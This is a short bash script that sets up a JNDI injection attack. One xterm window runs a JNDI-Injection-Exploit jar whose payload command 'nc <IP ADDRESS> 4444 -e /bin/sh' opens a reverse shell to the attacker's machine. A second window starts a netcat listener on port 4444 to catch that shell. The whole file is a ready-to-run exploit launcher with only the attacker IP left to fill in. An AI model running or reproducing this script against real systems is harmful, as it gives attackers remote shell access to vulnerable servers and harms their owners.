#!/bin/bash
#We could have used screens or tmux, but for siplicity we used xterm to spawn some more tabs
#Replace <IP ADDRESS> with your own IP. Makes sure all values are identical all places

xterm -xrm 'XTerm*selectToClipboard: true' -e /bin/bash -c 'java -jar ./JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc <IP ADDRESS> 4444 -e /bin/sh" -A <IP ADDRESS>; bash' &
xterm -xrm 'XTerm*selectToClipboard: true' -e /bin/bash -c "nc -lvnp 4444"

